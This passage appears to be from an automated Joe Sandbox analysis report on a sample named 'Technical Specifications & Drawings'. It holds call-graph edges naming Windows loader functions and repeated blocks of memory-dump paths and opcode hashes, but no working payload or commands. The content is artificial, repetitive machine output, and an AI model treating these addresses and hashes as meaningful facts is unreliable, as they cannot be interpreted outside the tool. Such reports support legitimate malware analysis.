18256 17b3f3b GetPEB 18250->18256 
18257 17b3f4d 18250->18257 18251->18245 18259 1808324 GetPEB 18251->18259 18260 17b404f 18251->18260 18252->18245 18253 17b3e74 18252->18253 18254 17b3e62 GetPEB 18252->18254 18253->18237 18255 17b3e81 GetPEB 18253->18255 18254->18253 18255->18237 18256->18257 18257->18244 18258 17b3f5a GetPEB 18257->18258 18258->18244 18259->18245 18260->18245 18261 17b4058 GetPEB 18260->18261 18261->18245 18264 17adcfd 18262->18264 18276 17add6f _vswprintf_s 18262->18276 18263 17add47 18293 17adbb1 18263->18293 18264->18263 18272 17adfc2 18264->18272 18284 17ae620 18264->18284 18266 1804ff2 18266->18266 18269 17adfae 18269->18272 18306 17e95d0 LdrInitializeThunk 18269->18306 18273 17eb640 _vswprintf_s 12 API calls 18272->18273 18275 17adfe4 18273->18275 18275->18222 18276->18266 18276->18269 18276->18272 18300 17ae375 18276->18300 18305 17e95d0 LdrInitializeThunk 18276->18305 18282 17b1ba9 _vswprintf_s 18278->18282 18283 17b1c05 18278->18283 18279 180701a GetPEB 18280 17b1c21 18279->18280 18280->18227 18281 17b1bf4 GetPEB 18281->18283 18282->18280 18282->18281 18282->18283 18283->18279 18283->18280 18285 1805503 18284->18285 18286 17ae644 18284->18286 18286->18285 18307 17af358 18286->18307 18288 17ae725 18290 17ae73b 18288->18290 18291 17ae729 GetPEB 18288->18291 18290->18263 18291->18290 18292 17ae661 _vswprintf_s 18292->18288 18311 17e95d0 LdrInitializeThunk 18292->18311 18312 17b766d 18293->18312 18295 17adbcf 18295->18276 18296 17adbf1 18295->18296 18297 17adc05 18296->18297 18298 17b766d GetPEB 18297->18298 18299 17adc22 18298->18299 18299->18276 18304 17ae3a3 18300->18304 18301 17eb640 _vswprintf_s 12 API calls 18303 17ae400 18301->18303 18302 1805306 18303->18276 18304->18301 18304->18302 18305->18276 18306->18272 18308 17af370 18307->18308 18309 17af38c 18308->18309 18310 17af379 GetPEB 18308->18310 18309->18292 18310->18309 18311->18288 18314 17b7687 18312->18314 18313 17b76d3 18313->18295 18314->18313 18315 17b76c2 GetPEB 18314->18315 18315->18313 18317 17a4dfa 
18316->18317 18319 17a4dd1 _vswprintf_s 18316->18319 18318 17a2e9f LdrInitializeThunk 18317->18318 18318->18319 18321 17a4df3 18319->18321 18338 17a4f2e 18319->18338 18321->17835 18423 17fd0e8 18322->18423 18324 183ff1c GetPEB 18325 183ff43 GetPEB 18324->18325 18326 183ff2b 18324->18326 18328 183ff6e 18325->18328 18329 183ff4f 18325->18329 18326->18325 18327 183ffb1 18326->18327 18332 17fd130 _vswprintf_s 12 API calls 18327->18332 18331 17de730 2 API calls 18328->18331 18330 1835720 _vswprintf_s 12 API calls 18329->18330 18330->18328 18333 183ff7d _vswprintf_s 18331->18333 18334 183ffb6 18332->18334 18335 183ffa4 18333->18335 18336 183ff94 RtlDebugPrintTimes 18333->18336 18334->17838 18335->17838 18337 183ffa3 18336->18337 18337->17838 18339 1800b85 18338->18339 18343 17a4f3e 18338->18343 18340 1800b9a 18339->18340 18341 1800b8b GetPEB 18339->18341 18347 18788f5 18340->18347 18341->18340 18344 1800b9f 18341->18344 18343->18339 18345 17a4f5b GetPEB 18343->18345 18345->18339 18346 17a4f6e 18345->18346 18346->18321 18348 1878901 _vswprintf_s 18347->18348 18353 17acc50 18348->18353 18350 187891f _vswprintf_s 18351 17fd130 _vswprintf_s 12 API calls 18350->18351 18352 1878946 18351->18352 18352->18344 18354 17acc79 18353->18354 18358 17acc7e 18354->18358 18359 17db230 18354->18359 18355 17eb640 _vswprintf_s 12 API calls 18356 17acc89 18355->18356 18356->18350 18358->18355 18360 17db26a 18359->18360 18361 181a2f6 18359->18361 18360->18361 18362 181a2fd 18360->18362 18367 17db2ab _vswprintf_s 18360->18367 18363 17db2b5 18362->18363 18377 1875ba5 18362->18377 18363->18361 18364 17eb640 _vswprintf_s 12 API calls 18363->18364 18366 17db2d0 18364->18366 18366->18358 18367->18363 18369 17accc0 18367->18369 18370 17acd04 18369->18370 18371 17ab150 _vswprintf_s 12 API calls 18370->18371 18376 17acd95 18370->18376 18372 1804e0a 18371->18372 18373 17ab150 _vswprintf_s 12 API calls 18372->18373 18374 1804e14 18373->18374 18375 17ab150 _vswprintf_s 12 API calls 18374->18375 
18375->18376 18376->18363 18379 1875bb4 _vswprintf_s 18377->18379 18378 1875c10 18380 17fd130 _vswprintf_s 12 API calls 18378->18380 18379->18378 18386 1875c2a _vswprintf_s 18379->18386 18388 1874c56 18379->18388 18382 18763e5 18380->18382 18382->18363 18385 18760cf GetPEB 18385->18386 18386->18378 18386->18385 18387 17e9710 LdrInitializeThunk 18386->18387 18392 17e6de6 18386->18392 18387->18386 18389 1874c62 _vswprintf_s 18388->18389 18390 17fd130 _vswprintf_s 12 API calls 18389->18390 18391 1874caa 18390->18391 18391->18386 18393 17e6e73 18392->18393 18395 17e6e03 18392->18395 18393->18386 18395->18393 18396 17e6e53 18395->18396 18398 17e6ebe 18395->18398 18396->18393 18406 17d6a60 18396->18406 18399 17beef0 27 API calls 18398->18399 18400 17e6eeb 18399->18400 18401 17e6f0d 18400->18401 18411 17e7742 18400->18411 18417 18584e0 18400->18417 18402 17beb70 34 API calls 18401->18402 18403 17e6f48 18402->18403 18403->18395 18407 1818025 18406->18407 18409 17d6a8d _vswprintf_s 18406->18409 18408 17eb640 _vswprintf_s 12 API calls 18410 17d6b66 18408->18410 18409->18407 18409->18408 18410->18393 18412 17e7827 18411->18412 18415 17e7768 _vswprintf_s 18411->18415 18412->18400 18413 17e9660 _vswprintf_s LdrInitializeThunk 18413->18415 18414 17beef0 27 API calls 18414->18415 18415->18412 18415->18413 18415->18414 18416 17beb70 34 API calls 18415->18416 18416->18415 18418 1858511 18417->18418 18419 17beb70 34 API calls 18418->18419 18420 1858556 18419->18420 18421 17beef0 27 API calls 18420->18421 18422 18585f1 18421->18422 18422->18400 18423->18324 18425 17c0074 18424->18425 18426 17c009d GetPEB 18425->18426 18439 17c00f8 18425->18439 18427 180c01b 18426->18427 18428 17c00d0 18426->18428 18427->18428 18430 180c024 GetPEB 18427->18430 18432 17c00df 18428->18432 18433 180c037 18428->18433 18429 17eb640 _vswprintf_s 12 API calls 18431 17c0105 18429->18431 18430->18428 18431->17844 18440 17d9702 18432->18440 18444 1878a62 18433->18444 18436 180c04b 18436->18436 18437 17c00ef 
18438 17c0109 RtlDebugPrintTimes 18437->18438 18437->18439 18438->18439 18439->18429 18441 17d9720 18440->18441 18443 17d9784 18441->18443 18451 1878214 18441->18451 18443->18437 18445 17c7d50 GetPEB 18444->18445 18446 1878a9d 18445->18446 18447 1878aa1 GetPEB 18446->18447 18448 1878ab1 _vswprintf_s 18446->18448 18447->18448 18449 17eb640 _vswprintf_s 12 API calls 18448->18449 18450 1878ad7 18449->18450 18450->18436 18453 187823b 18451->18453 18452 18782c0 18452->18443 18453->18452 18455 17d3b7a GetPEB 18453->18455 18459 17d3bb5 _vswprintf_s 18455->18459 18456 1816298 18457 17d3c1b GetPEB 18458 17d3c35 18457->18458 18458->18452 18459->18456 18459->18457 18459->18459 18461 17b7620 18460->18461 18462 17b766d GetPEB 18461->18462 18463 17b7632 18462->18463 18463->17851 18465 17e9670 18467 17e967a 18465->18467 18468 17e968f LdrInitializeThunk 18467->18468 18469 17e9681 18467->18469 18477 1875ba5 18479 1875bb4 _vswprintf_s 18477->18479 18478 1875c10 18480 17fd130 _vswprintf_s 12 API calls 18478->18480 18479->18478 18481 1874c56 12 API calls 18479->18481 18486 1875c2a _vswprintf_s 18479->18486 18482 18763e5 18480->18482 18481->18486 18484 17e6de6 33 API calls 18484->18486 18485 18760cf GetPEB 18485->18486 18486->18478 18486->18484 18486->18485 18487 17e9710 LdrInitializeThunk 18486->18487 18487->18486 19389 18602f7 19390 1860323 19389->19390 19394 18603b0 19390->19394 19403 1860a28 19390->19403 19392 1860342 19392->19394 19407 186bbbb 19392->19407 19393 18603d1 19394->19393 19441 186bcd2 19394->19441 19397 186035f 19397->19394 19416 187dfce 19397->19416 19404 1860a57 19403->19404 19406 1860a4d 19403->19406 19445 17d4e70 19404->19445 19406->19392 19408 186bbde 19407->19408 19453 186bd54 19408->19453 19411 186bc17 19457 186f9a1 19411->19457 19412 186bc3e 19467 186aa16 19412->19467 19415 186bc3c 19415->19397 19419 187dff0 19416->19419 19420 187e19d 19416->19420 19417 17eb640 _vswprintf_s 12 API calls 19418 1860388 19417->19418 19418->19394 19428 18603da 19418->19428 
19419->19420 20188 187e62a RtlDebugPrintTimes 19419->20188 19420->19417 19422 187e28a 20196 187e5b6 19422->20196 19423 187e2ed RtlDebugPrintTimes 19427 187e303 19423->19427 19424 187e1cd 19424->19420 19424->19422 19424->19423 19426 187e401 RtlDebugPrintTimes 19426->19422 19427->19422 19427->19426 19429 186bbbb 298 API calls 19428->19429 19432 1860404 19429->19432 19430 186039a 19430->19394 19437 187e4b3 19430->19437 19431 186058b 19431->19430 19433 186bcd2 279 API calls 19431->19433 19432->19430 19432->19431 20221 1860150 19432->20221 19433->19430 19438 187e4c9 19437->19438 19439 187e5b6 14 API calls 19438->19439 19440 187e5a7 19438->19440 19439->19440 19440->19394 19442 186bceb 19441->19442 20227 186ae44 19442->20227 19446 17d4e94 19445->19446 19447 17d4ec0 19445->19447 19449 17eb640 _vswprintf_s 12 API calls 19446->19449 19448 17d4ed6 RtlDebugPrintTimes 19447->19448 19452 17d4eeb 19447->19452 19448->19452 19450 17d4eac 19449->19450 19450->19406 19451 1858df1 13 API calls 19451->19446 19452->19446 19452->19451 19454 186bd63 19453->19454 19455 186bc04 19453->19455 19456 17d4e70 14 API calls 19454->19456 19455->19411 19455->19412 19455->19415 19456->19455 19458 186f9d6 19457->19458 19479 187022c 19458->19479 19460 186f9e1 19461 186f9e7 19460->19461 19462 186fa16 19460->19462 19485 18705ac 19460->19485 19461->19415 19465 186fa1a _vswprintf_s 19462->19465 19501 187070d 19462->19501 19465->19461 19515 1870a13 19465->19515 19468 186aa44 19467->19468 19474 186aa66 19468->19474 19984 186ab54 19468->19984 19469 17c7d50 GetPEB 19471 186ab0f 19469->19471 19472 186ab23 19471->19472 19473 186ab13 GetPEB 19471->19473 19475 186ab2d GetPEB 19472->19475 19476 186ab49 19472->19476 19473->19472 19474->19469 19475->19476 19477 186ab3c 19475->19477 19476->19415 19996 186131b 19477->19996 19481 1870278 19479->19481 19482 18702c2 19481->19482 19523 1870ea5 19481->19523 19483 18702e9 19482->19483 19550 17fcf85 19482->19550 19483->19460 19489 18705d1 19485->19489 19486 18706db 
19486->19462 19487 1870652 19488 186a854 34 API calls 19487->19488 19491 1870672 19488->19491 19489->19486 19489->19487 19490 186a80d 28 API calls 19489->19490 19490->19487 19491->19486 19705 1871293 19491->19705 19494 17c7d50 GetPEB 19495 187069c 19494->19495 19496 18706b0 19495->19496 19497 18706a0 GetPEB 19495->19497 19496->19486 19498 18706ba GetPEB 19496->19498 19497->19496 19498->19486 19499 18706c9 19498->19499 19500 186138a 14 API calls 19499->19500 19500->19486 19502 1870734 19501->19502 19503 18707d2 19502->19503 19504 186afde 34 API calls 19502->19504 19503->19465 19505 1870782 19504->19505 19506 1871293 34 API calls 19505->19506 19507 187078e 19506->19507 19508 17c7d50 GetPEB 19507->19508 19509 1870793 19508->19509 19510 18707a7 19509->19510 19511 1870797 GetPEB 19509->19511 19510->19503 19512 18707b1 GetPEB 19510->19512 19511->19510 19512->19503 19513 18707c0 19512->19513 19514 18614fb 14 API calls 19513->19514 19514->19503 19516 1870a3c 19515->19516 19709 1870392 19516->19709 19519 17fcf85 34 API calls 19520 1870aec 19519->19520 19521 1870b19 19520->19521 19522 1871074 36 API calls 19520->19522 19521->19461 19522->19521 19554 186ff69 19523->19554 19525 187105b 19527 1871055 19525->19527 19586 1871074 19525->19586 19526 1870f32 19560 186a854 19526->19560 19527->19482 19530 1870ecb 19530->19525 19530->19526 19532 186a80d 28 API calls 19530->19532 19531 1870fab 19534 17c7d50 GetPEB 19531->19534 19532->19526 19535 1870fcf 19534->19535 19537 1870fe3 19535->19537 19538 1870fd3 GetPEB 19535->19538 19536 1870f50 19536->19525 19536->19531 19568 18715b5 19536->19568 19539 187100e 19537->19539 19540 1870fed GetPEB 19537->19540 19538->19537 19541 17c7d50 GetPEB 19539->19541 19540->19539 19542 1870ffc 19540->19542 19543 1871013 19541->19543 19544 186138a 14 API calls 19542->19544 19545 1871027 19543->19545 19546 1871017 GetPEB 19543->19546 19544->19539 19547 1871041 19545->19547 19572 185fec0 19545->19572 19546->19545 19547->19527 19580 18652f8 19547->19580 19552 
17fcf98 19550->19552 19551 17fcfb1 19551->19483 19552->19551 19553 18652f8 34 API calls 19552->19553 19553->19551 19555 186ff9f 19554->19555 19559 186ffd1 19554->19559 19558 186a80d 28 API calls 19555->19558 19555->19559 19556 186a854 34 API calls 19557 186fff1 19556->19557 19557->19530 19558->19559 19559->19556 19561 186a8c0 19560->19561 19562 186a941 19560->19562 19561->19562 19598 186f021 19561->19598 19564 186aa00 19562->19564 19602 18653d9 19562->19602 19566 17eb640 _vswprintf_s 12 API calls 19564->19566 19567 186aa10 19566->19567 19567->19536 19569 18715d0 19568->19569 19571 18715d7 19568->19571 19570 187165e LdrInitializeThunk 19569->19570 19570->19571 19571->19536 19571->19571 19573 185fee5 _vswprintf_s 19572->19573 19574 17c7d50 GetPEB 19573->19574 19575 185ff02 19574->19575 19576 185ff06 GetPEB 19575->19576 19577 185ff16 _vswprintf_s 19575->19577 19576->19577 19578 17eb640 _vswprintf_s 12 API calls 19577->19578 19579 185ff3b 19578->19579 19579->19547 19581 18653c7 19580->19581 19582 1865321 19580->19582 19584 17eb640 _vswprintf_s 12 API calls 19581->19584 19583 1827b9c 34 API calls 19582->19583 19583->19581 19585 18653d5 19584->19585 19585->19527 19587 1871095 19586->19587 19588 18710b0 19586->19588 19589 187165e LdrInitializeThunk 19587->19589 19663 186afde 19588->19663 19589->19588 19592 17c7d50 GetPEB 19593 18710cd 19592->19593 19594 18710e1 19593->19594 19595 18710d1 GetPEB 19593->19595 19596 18710fa 19594->19596 19672 185fe3f 19594->19672 19595->19594 19596->19527 19599 186f03a 19598->19599 19616 186ee22 19599->19616 19603 18653f7 19602->19603 19604 1865552 19602->19604 19606 1865403 19603->19606 19607 18654eb 19603->19607 19605 186547c 19604->19605 19608 1827b9c 34 API calls 19604->19608 19611 17eb640 _vswprintf_s 12 API calls 19605->19611 19609 1865481 19606->19609 19610 186540b 19606->19610 19607->19605 19613 1827b9c 34 API calls 19607->19613 19608->19605 19609->19605 19614 1827b9c 34 API calls 19609->19614 19610->19605 19647 1827b9c 19610->19647 
19612 18655bd 19611->19612 19612->19564 19613->19605 19614->19605 19617 186ee5d 19616->19617 19620 186ef09 19617->19620 19622 186ee73 19617->19622 19618 17eb640 _vswprintf_s 12 API calls 19621 186efd4 19618->19621 19619 186eef5 19619->19618 19620->19619 19632 186f8c5 19620->19632 19621->19562 19622->19619 19627 186f607 19622->19627 19630 186f626 19627->19630 19628 186eedd 19628->19619 19631 17e96e0 LdrInitializeThunk 19628->19631 19630->19628 19638 187165e 19630->19638 19631->19619 19633 186f8ea 19632->19633 19634 186f932 19633->19634 19635 186f607 LdrInitializeThunk 19633->19635 19634->19619 19636 186f90f 19635->19636 19636->19634 19646 17e96e0 LdrInitializeThunk 19636->19646 19641 187166a _vswprintf_s 19638->19641 19639 1871869 _vswprintf_s 19639->19630 19641->19639 19642 1871d55 19641->19642 19645 1871d61 _vswprintf_s 19642->19645 19643 1871fc5 _vswprintf_s 19643->19641 19644 17e96e0 _vswprintf_s LdrInitializeThunk 19644->19643 19645->19643 19645->19644 19646->19634 19650 17e1130 19647->19650 19653 17e115f 19650->19653 19654 181cd96 19653->19654 19655 17e11a8 19653->19655 19655->19654 19656 181cd9d 19655->19656 19660 17e11e9 _vswprintf_s 19655->19660 19658 1875ba5 34 API calls 19656->19658 19662 17e12bd 19656->19662 19657 17eb640 _vswprintf_s 12 API calls 19659 17e1159 19657->19659 19658->19662 19659->19605 19661 17accc0 _vswprintf_s 12 API calls 19660->19661 19660->19662 19661->19662 19662->19654 19662->19657 19664 186b00a 19663->19664 19667 186b039 19663->19667 19665 186b00e 19664->19665 19664->19667 19668 186b026 19665->19668 19680 186f209 19665->19680 19666 186b035 19666->19668 19671 18653d9 34 API calls 19666->19671 19667->19666 19689 17e96e0 LdrInitializeThunk 19667->19689 19668->19592 19671->19668 19673 185fe64 _vswprintf_s 19672->19673 19674 17c7d50 GetPEB 19673->19674 19675 185fe81 19674->19675 19676 185fe85 GetPEB 19675->19676 19677 185fe95 _vswprintf_s 19675->19677 19676->19677 19678 17eb640 _vswprintf_s 12 API calls 19677->19678 19679 185feba 

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 14 17e9910-17e991c LdrInitializeThunk
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.346919106.0000000001780000.00000040.00000800.00020000.00000000.sdmp, Offset: 01780000, based on PE: true
                                                  • Associated: 00000004.00000002.348742770.000000000189B000.00000040.00000800.00020000.00000000.sdmp
                                                  • Associated: 00000004.00000002.348772341.000000000189F000.00000040.00000800.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_1780000_Technical Specifications & Drawings.jbxd
                                                  Similarity
                                                  • API ID: InitializeThunk
                                                  • String ID:
                                                  • API String ID: 2994545307-0
                                                  • Opcode ID: 7a840c72da028147af10cbc7b3acc407d982920d0927bc8a307ae90b0f345b26
                                                  • Instruction ID: 79bfb01dda80238b58b22cfdabe9816f68e2e36efac01f065d6c790aa17fe767
                                                  • Opcode Fuzzy Hash: 7a840c72da028147af10cbc7b3acc407d982920d0927bc8a307ae90b0f345b26
                                                  • Instruction Fuzzy Hash: E99002B120500406D150719984047474005A7D4341F52C025A6054564EC6998DD5B6A6
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 15 17e99a0-17e99ac LdrInitializeThunk
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.346919106.0000000001780000.00000040.00000800.00020000.00000000.sdmp, Offset: 01780000, based on PE: true
                                                  • Associated: 00000004.00000002.348742770.000000000189B000.00000040.00000800.00020000.00000000.sdmp
                                                  • Associated: 00000004.00000002.348772341.000000000189F000.00000040.00000800.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_1780000_Technical Specifications & Drawings.jbxd
                                                  Similarity
                                                  • API ID: InitializeThunk
                                                  • String ID:
                                                  • API String ID: 2994545307-0
                                                  • Opcode ID: a71dab169c405e3026ff0082e042079728becc7b046c0105f458a44a468f4a8d
                                                  • Instruction ID: 692d4e9027130b635d80960ab71a131b92217d6fec7b8c8b75d790e598efbc57
                                                  • Opcode Fuzzy Hash: a71dab169c405e3026ff0082e042079728becc7b046c0105f458a44a468f4a8d
                                                  • Instruction Fuzzy Hash: 729002A134500446D11061998414B074005E7E5341F52C029E2054564DC659CC52B167
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 12 17e9860-17e986c LdrInitializeThunk
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.346919106.0000000001780000.00000040.00000800.00020000.00000000.sdmp, Offset: 01780000, based on PE: true
                                                  • Associated: 00000004.00000002.348742770.000000000189B000.00000040.00000800.00020000.00000000.sdmp
                                                  • Associated: 00000004.00000002.348772341.000000000189F000.00000040.00000800.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_1780000_Technical Specifications & Drawings.jbxd
                                                  Similarity
                                                  • API ID: InitializeThunk
                                                  • String ID:
                                                  • API String ID: 2994545307-0
                                                  • Opcode ID: 93862c761c16f5723d4f434f2fe1d8fea166b688e6d2dc26ca7dce802be9ce4d
                                                  • Instruction ID: 0daf39be8af24363e99b2e50f419793b5b4234a2f216ef81fa7c5e1af2ef847e
                                                  • Opcode Fuzzy Hash: 93862c761c16f5723d4f434f2fe1d8fea166b688e6d2dc26ca7dce802be9ce4d
                                                  • Instruction Fuzzy Hash: F390027120500417D121619985047074009A7D4281F92C426A1414568DD6968952F162
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 11 17e9840-17e984c LdrInitializeThunk
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.346919106.0000000001780000.00000040.00000800.00020000.00000000.sdmp, Offset: 01780000, based on PE: true
                                                  • Associated: 00000004.00000002.348742770.000000000189B000.00000040.00000800.00020000.00000000.sdmp
                                                  • Associated: 00000004.00000002.348772341.000000000189F000.00000040.00000800.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_1780000_Technical Specifications & Drawings.jbxd
                                                  Similarity
                                                  • API ID: InitializeThunk
                                                  • String ID:
                                                  • API String ID: 2994545307-0
                                                  • Opcode ID: 321fae458367e9be184f099e5dedf400821e63a3e69267b1bae76304ae609c2a
                                                  • Instruction ID: 2ebc8b6ba58e70170362992cd9c1066f9e0d399a7bdc0e420da48929e53eea4d
                                                  • Opcode Fuzzy Hash: 321fae458367e9be184f099e5dedf400821e63a3e69267b1bae76304ae609c2a
                                                  • Instruction Fuzzy Hash: 1F900261246041565555B19984046078006B7E4281792C026A2404960CC5669856F662
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 13 17e98f0-17e98fc LdrInitializeThunk
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.346919106.0000000001780000.00000040.00000800.00020000.00000000.sdmp, Offset: 01780000, based on PE: true
                                                  • Associated: 00000004.00000002.348742770.000000000189B000.00000040.00000800.00020000.00000000.sdmp
                                                  • Associated: 00000004.00000002.348772341.000000000189F000.00000040.00000800.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_1780000_Technical Specifications & Drawings.jbxd
                                                  Similarity
                                                  • API ID: InitializeThunk
                                                  • String ID:
                                                  • API String ID: 2994545307-0
                                                  • Opcode ID: 47449af7ebab8992bdfd7abdc2e313390985503f70b64f56a9c64040bd07dcc7
                                                  • Instruction ID: 7a66c694599a4da42799626b62d2572db962246eeb0c162d2e5ae0881427e0da
                                                  • Opcode Fuzzy Hash: 47449af7ebab8992bdfd7abdc2e313390985503f70b64f56a9c64040bd07dcc7
                                                  • Instruction Fuzzy Hash: CA90026160500506D11171998404717400AA7D4281F92C036A2014565ECA658992F172
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.346919106.0000000001780000.00000040.00000800.00020000.00000000.sdmp, Offset: 01780000, based on PE: true
                                                  • Associated: 00000004.00000002.348742770.000000000189B000.00000040.00000800.00020000.00000000.sdmp
                                                  • Associated: 00000004.00000002.348772341.000000000189F000.00000040.00000800.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_1780000_Technical Specifications & Drawings.jbxd
                                                  Similarity
                                                  • API ID: InitializeThunk
                                                  • String ID:
                                                  • API String ID: 2994545307-0
                                                  • Opcode ID: 2d61c5fb151b320fb1002956d3e033294c845bb5784d743ef75edcc80a2380f5
                                                  • Instruction ID: 40c15c6c000b8c642820b464d391d426c63e9d0a9f2f8ae241a0cb09ddda78e6
                                                  • Opcode Fuzzy Hash: 2d61c5fb151b320fb1002956d3e033294c845bb5784d743ef75edcc80a2380f5
                                                  • Instruction Fuzzy Hash: 8690026121580046D21065A98C14B074005A7D4343F52C129A1144564CC9558861B562
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 17 17e9a20-17e9a2c LdrInitializeThunk
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.346919106.0000000001780000.00000040.00000800.00020000.00000000.sdmp, Offset: 01780000, based on PE: true
                                                  • Associated: 00000004.00000002.348742770.000000000189B000.00000040.00000800.00020000.00000000.sdmp
                                                  • Associated: 00000004.00000002.348772341.000000000189F000.00000040.00000800.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_1780000_Technical Specifications & Drawings.jbxd
                                                  Similarity
                                                  • API ID: InitializeThunk
                                                  • String ID:
                                                  • API String ID: 2994545307-0
                                                  • Opcode ID: ca34a45756cd442ea7c5debef6f6e4dde616f2066c3d381045c18c693430b99b
                                                  • Instruction ID: 24d67dc8972e1af86650f1bc858031b173c65cbc7f6345431267b0e2890b1e53
                                                  • Opcode Fuzzy Hash: ca34a45756cd442ea7c5debef6f6e4dde616f2066c3d381045c18c693430b99b
                                                  • Instruction Fuzzy Hash: C290026160500046415071A9C844A078005BBE5251752C135A1988560DC5998865B6A6
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 16 17e9a00-17e9a0c LdrInitializeThunk
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.346919106.0000000001780000.00000040.00000800.00020000.00000000.sdmp, Offset: 01780000, based on PE: true
                                                  • Associated: 00000004.00000002.348742770.000000000189B000.00000040.00000800.00020000.00000000.sdmp
                                                  • Associated: 00000004.00000002.348772341.000000000189F000.00000040.00000800.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_1780000_Technical Specifications & Drawings.jbxd
                                                  Similarity
                                                  • API ID: InitializeThunk
                                                  • String ID:
                                                  • API String ID: 2994545307-0
                                                  • Opcode ID: ceba40530cd5d0353b2e5c277cb7dddcf9c034b6b3ab401f5ae3312c446dfb2e
                                                  • Instruction ID: dbaca7f71cdd81e77ffc9a7170ee19cf26080f98205ae2c932267a697b9e5286
                                                  • Opcode Fuzzy Hash: ceba40530cd5d0353b2e5c277cb7dddcf9c034b6b3ab401f5ae3312c446dfb2e
                                                  • Instruction Fuzzy Hash: 2290027120540406D1106199881470B4005A7D4342F52C025A2154565DC6658851B5B2
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 4 17e9540-17e954c LdrInitializeThunk
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.346919106.0000000001780000.00000040.00000800.00020000.00000000.sdmp, Offset: 01780000, based on PE: true
                                                  • Associated: 00000004.00000002.348742770.000000000189B000.00000040.00000800.00020000.00000000.sdmp
                                                  • Associated: 00000004.00000002.348772341.000000000189F000.00000040.00000800.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_1780000_Technical Specifications & Drawings.jbxd
                                                  Similarity
                                                  • API ID: InitializeThunk
                                                  • String ID:
                                                  • API String ID: 2994545307-0
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Control-flow Graph

                                                  control_flow_graph 5 17e95d0-17e95dc LdrInitializeThunk
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.346919106.0000000001780000.00000040.00000800.00020000.00000000.sdmp, Offset: 01780000, based on PE: true
                                                  • Associated: 00000004.00000002.348742770.000000000189B000.00000040.00000800.00020000.00000000.sdmp
                                                  • Associated: 00000004.00000002.348772341.000000000189F000.00000040.00000800.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_1780000_Technical Specifications & Drawings.jbxd
                                                  Similarity
                                                  • API ID: InitializeThunk
                                                  • String ID:
                                                  • API String ID: 2994545307-0
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Control-flow Graph

                                                  control_flow_graph 8 17e9710-17e971c LdrInitializeThunk
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.346919106.0000000001780000.00000040.00000800.00020000.00000000.sdmp, Offset: 01780000, based on PE: true
                                                  • Associated: 00000004.00000002.348742770.000000000189B000.00000040.00000800.00020000.00000000.sdmp
                                                  • Associated: 00000004.00000002.348772341.000000000189F000.00000040.00000800.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_1780000_Technical Specifications & Drawings.jbxd
                                                  Similarity
                                                  • API ID: InitializeThunk
                                                  • String ID:
                                                  • API String ID: 2994545307-0
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.346919106.0000000001780000.00000040.00000800.00020000.00000000.sdmp, Offset: 01780000, based on PE: true
                                                  • Associated: 00000004.00000002.348742770.000000000189B000.00000040.00000800.00020000.00000000.sdmp
                                                  • Associated: 00000004.00000002.348772341.000000000189F000.00000040.00000800.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_1780000_Technical Specifications & Drawings.jbxd
                                                  Similarity
                                                  • API ID: InitializeThunk
                                                  • String ID:
                                                  • API String ID: 2994545307-0
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Control-flow Graph

                                                  control_flow_graph 10 17e97a0-17e97ac LdrInitializeThunk
                                                  APIs
